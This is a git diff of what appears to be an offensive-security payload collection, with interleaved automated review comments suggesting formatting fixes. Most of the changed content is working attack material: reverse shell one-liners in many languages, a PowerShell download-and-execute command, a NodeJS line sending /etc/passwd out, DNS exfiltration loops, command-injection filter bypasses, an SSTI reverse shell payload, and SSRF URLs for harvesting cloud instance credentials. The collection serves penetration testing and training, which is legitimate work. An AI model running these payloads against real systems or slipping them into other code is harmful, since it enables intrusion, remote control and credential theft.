diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index ba81b2d..371afdc 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -2,14 +2,14 @@
 ## Reverse Shell Cheat Sheet
-Bash TCP
+### Bash TCP
 ```bash
 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
 0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196
 ```
-Bash UDP
+### Bash UDP
 ```
 Victim:
 sh -i >& /dev/udp/127.0.0.1/4242 0>&1
@@ -19,7 +19,7 @@ nc -u -lvp 4242
 ```
-Perl
+### Perl
 ```perl
 perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
@@ -30,17 +30,17 @@ NOTE: Windows only
 perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 ```
-Python
+### Python
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 ```
-PHP
+### PHP
 ```bash
 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
-Ruby
+### Ruby
 ```ruby
 ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
@@ -51,23 +51,23 @@ ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.pope
 ```
-Netcat Traditional
+### Netcat Traditional
 ```bash
 nc -e /bin/sh [IPADDR] [PORT]
 ```
-Netcat OpenBsd
+### Netcat OpenBsd
 ```bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
 ```
-Ncat
+### Ncat
 ```bash
 ncat 127.0.0.1 4444 -e /bin/bash
 ncat --udp 127.0.0.1 4444 -e /bin/bash
 ```
-Powershell
+### Powershell
 ```powershell
 powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
@@ -81,14 +81,14 @@ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40
 powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
 ```
-Java
+### Java
 ```java
 r = Runtime.getRuntime()
 p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
 p.waitFor()
 ```
-NodeJS
+### NodeJS
 ```javascript
 (function(){
 var net = require("net"),
@@ -102,8 +102,28 @@ NodeJS
 });
 return /a/; // Prevents the Node.js application form crashing
 })();
+
+
+or
+
+require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
+
+or
+
+-var x = global.process.mainModule.require
+-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
 ```
+### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
+```javascript
+String host="localhost";
+int port=8044;
+String cmd="cmd.exe";
+Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
+```
+NOTE: Java reverse shell also work for Groovy
+
+
 ## Spawn TTY
 ```
 /bin/sh -i
diff --git a/README.md b/README.md
index fcf8296..4cc0c5e 100644
--- a/README.md
+++ b/README.md
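Review bot: The two added NodeJS lines `-var x = global.process.mainModule.require` and `-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')` carry a stray leading `-` as part of the added content (the old side of this hunk has no such lines to remove), so the snippet as pasted is not valid JavaScript — `-var` is a syntax error; drop the dashes so the lines read `var x = global.process.mainModule.require` and `x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')`. The new Groovy snippet is fenced as ```javascript; tagging it ```groovy keeps it from being read as part of the NodeJS section directly above it. The trailing note would also be clearer as `NOTE: the Java reverse shell above also works for Groovy.`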
@@ -29,68 +29,40 @@ You might also like :
 * Tomcat CVE-2017-12617.py
-## Tools
-* [Kali Linux](https://www.kali.org/)
-* [Web Developer](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
-* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search) - Not compatible with Firefox Quantum
-* [Burp Proxy](https://portswigger.net)
-* [Fiddler](https://www.telerik.com/download/fiddler)
-* [DirBuster](https://sourceforge.net/projects/dirbuster/)
-* [GoBuster](https://github.com/OJ/gobuster)
-* [Knockpy](https://github.com/guelfoweb/knock)
-* [SQLmap](http://sqlmap.org)
-* [Nikto](https://cirt.net/nikto2)
-* [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner)
-* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
-* [Wappalyzer](https://wappalyzer.com/download)
-* [Metasploit](https://www.metasploit.com/)
-* [OpenVAS](http://www.openvas.org/)
+## Try Harder
+Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
+* __Bug Bounty Platforms__
+ * [HackerOne](https://hackerone.com)
+ * [BugCrowd](https://bugcrowd.com)
+ * [Bounty Factory](https://bountyfactory.io)
+ * [Synack](https://www.synack.com/)
+ * [Intigriti](https://www.intigriti.com)
+ * [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
+* __Online Platforms__
+ * [Hack The Box](hackthebox.eu/)
+ * [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
+ * [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
+ * [Zenk-Security](https://www.zenk-security.com/epreuves.php)
+ * [Root-Me](https://www.root-me.org)
+ * [W3Challs](https://w3challs.com/)
+ * [NewbieContest](https://www.newbiecontest.org/)
+ * [Vulnhub](https://www.vulnhub.com/)
+ * [The Cryptopals Crypto Challenges](https://cryptopals.com/)
+ * [alert(1) to win](https://alf.nu/alert1)
+ * [Hacksplaining](https://www.hacksplaining.com/exercises)
+ * [HackThisSite](https://hackthissite.org)
+ * [Hackers.gg](hackers.gg)
+ * [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
-## Online Challenges
-* [Hack The Box](hackthebox.eu/)
-* [Root-Me](https://www.root-me.org)
-* [Zenk-Security](https://www.zenk-security.com/epreuves.php)
-* [W3Challs](https://w3challs.com/)
-* [NewbieContest](https://www.newbiecontest.org/)
-* [Vulnhub](https://www.vulnhub.com/)
-* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
-* [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html)
-* [alert(1) to win](https://alf.nu/alert1)
-* [Hacksplaining](https://www.hacksplaining.com/exercises)
-* [HackThisSite](https://hackthissite.org)
-* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
-* [Hackers.gg](hackers.gg)
-
-## Bug Bounty
-* [HackerOne](https://hackerone.com)
-* [BugCrowd](https://bugcrowd.com)
-* [Bounty Factory](https://bountyfactory.io)
-* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
-
-## Docker
-| Command | Link |
-| :------------- | :------------- |
-| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
-| `docker pull paoloo/sqlmap` | [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/) |
-| `docker pull kalilinux/kali-linux-docker` | [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) |
-| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
-| `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
-| `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
-| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
-| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
-| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
-| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
-| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
-| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
-
-
-## More resources
-### Book's list:
+## Book's list
+Grab a book and relax, these ones are the best security books (in my opinion).
 * [Web Hacking 101](https://leanpub.com/web-hacking-101)
+* [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
 * [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
 * [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
 * [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
+* [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
 * [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
 * [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
 * [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
@@ -104,16 +76,36 @@ You might also like :
 * [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
 * [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
+
+## More resources
+
 ### Blogs/Websites
-* http://blog.zsec.uk/101-web-testing-tooling/
-* https://blog.innerht.ml
-* https://blog.zsec.uk
-* https://www.exploit-db.com/google-hacking-database
-* https://www.arneswinnen.net
-* https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102
+* [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
+* [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
+* [Tips from Top Hackers – Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
+* [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
+* [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
+* [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
 ### Youtube
 * [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
 * [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
 * [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
 * [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
+
+
+### Docker
+| Command | Link |
+| :------------- | :------------- |
+| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
+| `docker pull paoloo/sqlmap` | [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/) |
+| `docker pull kalilinux/kali-linux-docker` | [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) |
+| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
+| `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
+| `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
+| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
+| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
+| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
+| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
+| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
+| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
\ No newline at end of file
diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 0aa1f6b..3f09572 100644
--- a/Remote commands execution/README.md
+++ b/Remote commands execution/README.md
@@ -1,5 +1,6 @@
 # Remote Commands Execution
-Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
+Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
+NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
 ## Exploits
@@ -87,6 +88,13 @@ Bypass blacklisted word with $@
 who$@ami
 ```
+Bypass blacklisted word with variable expansion
+```powershell
+test=/ehhh/hmtc/pahhh/hmsswd
+cat ${test//hhh\/hm/}
+cat ${test//hh??hm/}
+```
+
 Bypass zsh/bash/sh blacklist
 ```powershell
 echo $0
@@ -94,6 +102,12 @@ echo $0
 echo whoami|$0
 ```
+## Challenge
+Challenge based on the previous tricks, what does the following command do:
+```powershell
+g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
+```
+
 ## Time based data exfiltration
 Extracting data : char by char
@@ -118,13 +132,9 @@ Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.
 for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
-## Environment based
-NodeJS Commands execution
-```powershell
-require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
-```
 ## Thanks to
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
 * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
 * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
+* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index 07fb99e..132a69d 100644
--- a/SSRF injection/README.md
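Review bot: The re-added opening line in the first hunk keeps the `Commandss` typo and states the vulnerability backwards — the attacker's commands run on the vulnerable server, not "from a remote server"; suggest `Remote Command Execution (RCE) is a vulnerability that allows an attacker to execute arbitrary commands on the target server.` The new NOTE line reads better as `NOTE: reverse shell commands have been relocated to a [single file](…)`, keeping the same link target.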
+++ b/SSRF injection/README.md
@@ -1,6 +1,23 @@
 # Server-Side Request Forgery
 Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
+## Summary
+* [Exploit with localhost]()
+* [Bypassing filters]()
+* [SSRF via URL Scheme]()
+* [SSRF to XSS]()
+* [SSRF URL for Cloud Instances]()
+ * [SSRF URL for AWS Bucket]()
+ * [SSRF URL for Google Cloud]()
+ * [SSRF URL for Digital Ocean]()
+ * [SSRF URL for Packetcloud]()
+ * [SSRF URL for Azure]()
+ * [SSRF URL for OpenStack/RackSpace]()
+ * [SSRF URL for HP Helion]()
+ * [SSRF URL for Oracle Cloud]()
+ * [SSRF URL for Alibaba]()
+
+
 ## Exploit with localhost
 Basic SSRF v1
@@ -203,8 +220,9 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut
 ```
-
-## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
+## SSRF URL for Cloud Instances
+### SSRF URL for AWS Bucket
+[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
 Interesting path to look for at http://169.254.169.254
 ```
 Always here : /latest/meta-data/{hostname,public-ipv4,...}
@@ -253,7 +271,7 @@ http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
 http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
 ```
-## SSRF URL for Google Cloud
+### SSRF URL for Google Cloud
 Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
 ```
 http://169.254.169.254/computeMetadata/v1/
@@ -275,7 +293,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/
 ```
-## SSRF URL for Digital Ocean
+### SSRF URL for Digital Ocean
 https://developers.digitalocean.com/documentation/metadata/
 ```powershell
 curl http://169.254.169.254/metadata/v1/id
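Review bot: Every entry in the new Summary is an empty link, e.g. `* [Exploit with localhost]()`, so the table of contents renders but navigates nowhere; fill in the heading anchors, e.g. `* [Exploit with localhost](#exploit-with-localhost)` and `* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)`. The nested cloud entries should follow the same pattern (`#ssrf-url-for-aws-bucket`, `#ssrf-url-for-google-cloud`, and so on), matching the `###` headings the later hunks introduce.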
@@ -291,12 +309,12 @@ All in one request:
 curl http://169.254.169.254/metadata/v1.json | jq
 ```
-## SSRF URL for Packetcloud
+### SSRF URL for Packetcloud
 ```
 https://metadata.packet.net/userdata
 ```
-## SSRF URL for Azure
+### SSRF URL for Azure
 Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
 ```
 http://169.254.169.254/metadata/v1/maintenance
@@ -308,19 +326,19 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
 ```
-## SSRF URL for OpenStack/RackSpace
+### SSRF URL for OpenStack/RackSpace
 (header required? unknown)
 ```
 http://169.254.169.254/openstack
 ```
-## SSRF URL for HP Helion
+### SSRF URL for HP Helion
 (header required? unknown)
 ```
 http://169.254.169.254/2009-04-04/meta-data/
 ```
-## SSRF URL for Oracle Cloud
+### SSRF URL for Oracle Cloud
 ```
 http://192.0.0.192/latest/
 http://192.0.0.192/latest/user-data/
@@ -328,7 +346,7 @@ http://192.0.0.192/latest/meta-data/
 http://192.0.0.192/latest/attributes/
 ```
-## SSRF URL for Alibaba
+### SSRF URL for Alibaba
 ```
 http://100.100.100.200/latest/meta-data/
 http://100.100.100.200/latest/meta-data/instance-id
diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md
index 46ffe66..01a835f 100644
--- a/Server Side Template injections/README.md
+++ b/Server Side Template injections/README.md
@@ -5,10 +5,11 @@ Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
 e.g:
 ```
-./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
+python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
+python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
+python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
 ```
-
 ## Ruby
 ### Basic injection
 ```python
@@ -21,8 +22,8 @@ e.g:
 ```
-## Java
-### Basic injection
+## Java
+### Basic injection
 ```java
 ${7*7}
 ${{7*7}}
@@ -174,6 +175,13 @@ Inject this template
 {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
 ```
+## AngularJS
+### Basic injection
+```javascript
+$eval('1+1')
+{{1+1}}
+```
+
 ## Thanks to
 * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
 * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
diff --git a/Web cache deception/README.md b/Web cache deception/README.md
index c957dba..9bd5833 100644
--- a/Web cache deception/README.md
+++ b/Web cache deception/README.md
@@ -18,8 +18,9 @@
 5. The content of the cache is displayed
 ```
-[![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
+[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
 Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
 ## Thanks to
-* http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html
\ No newline at end of file
+* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
+* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
\ No newline at end of file
diff --git a/XSS injection/README.md b/XSS injection/README.md
index aa5f418..2cfc371 100644
--- a/XSS injection/README.md
+++ b/XSS injection/README.md
@@ -644,6 +644,12 @@ Exotic payloads
 ## Common WAF Bypass
+### Chrome Auditor - 9th august
+```javascript
+uxldz
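Review bot: The new AngularJS section (`$eval('1+1')` / `{{1+1}}`) sits on a page about server-side template injection, but AngularJS evaluates these expressions in the victim's browser, so the outcome is client-side template injection leading to XSS rather than the server-side code execution every other engine on this page yields; a one-line caveat under the `## AngularJS` heading would prevent misclassification, e.g. `NOTE: AngularJS is a client-side framework — injection here is CSTI/XSS in the browser, not server-side RCE.` It may also be worth noting that `{{1+1}}` only confirms interpolation and that reaching script execution on sandboxed AngularJS versions needs a sandbox escape, though the hunk itself does not cover that.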
@@ -663,10 +669,10 @@ Use notification box instead of an alert - by [@brutelogic](https://twitter.com/
 Note : it requires user permission
 ```
 Notification.requestPermission(x=>{new(Notification)(1)})
-
-Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//
 ```
+Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)
+
 ## Thanks to
 * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
diff --git a/XXE injections/Files/Classic XXE - etc passwd.xml b/XXE injection/Files/Classic XXE - etc passwd.xml
similarity index 100%
rename from XXE injections/Files/Classic XXE - etc passwd.xml
rename to XXE injection/Files/Classic XXE - etc passwd.xml
diff --git a/XXE injections/Files/Classic XXE B64 Encoded.xml b/XXE injection/Files/Classic XXE B64 Encoded.xml
similarity index 100%
rename from XXE injections/Files/Classic XXE B64 Encoded.xml
rename to XXE injection/Files/Classic XXE B64 Encoded.xml
diff --git a/XXE injections/Files/Classic XXE.xml b/XXE injection/Files/Classic XXE.xml
similarity index 100%
rename from XXE injections/Files/Classic XXE.xml
rename to XXE injection/Files/Classic XXE.xml
diff --git a/XXE injections/Files/Deny Of Service - Billion Laugh Attack b/XXE injection/Files/Deny Of Service - Billion Laugh Attack
similarity index 100%
rename from XXE injections/Files/Deny Of Service - Billion Laugh Attack
rename to XXE injection/Files/Deny Of Service - Billion Laugh Attack
diff --git a/XXE injections/Files/XXE OOB Attack (Yunusov, 2013).xml b/XXE injection/Files/XXE OOB Attack (Yunusov, 2013).xml
similarity index 100%
rename from XXE injections/Files/XXE OOB Attack (Yunusov, 2013).xml
rename to XXE injection/Files/XXE OOB Attack (Yunusov, 2013).xml
diff --git a/XXE injections/Files/XXE PHP Wrapper.xml b/XXE injection/Files/XXE PHP Wrapper.xml
similarity index 100%
rename from XXE injections/Files/XXE PHP Wrapper.xml
rename to XXE injection/Files/XXE PHP Wrapper.xml
diff --git a/XXE injections/Intruders/XXE_Fuzzing.txt b/XXE injection/Intruders/XXE_Fuzzing.txt
similarity index 100%
rename from XXE injections/Intruders/XXE_Fuzzing.txt
rename to XXE injection/Intruders/XXE_Fuzzing.txt
diff --git a/XXE injections/Intruders/xml-attacks.txt b/XXE injection/Intruders/xml-attacks.txt
similarity index 100%
rename from XXE injections/Intruders/xml-attacks.txt
rename to XXE injection/Intruders/xml-attacks.txt
diff --git a/XXE injections/README.md b/XXE injection/README.md
similarity index 100%
rename from XXE injections/README.md
rename to XXE injection/README.md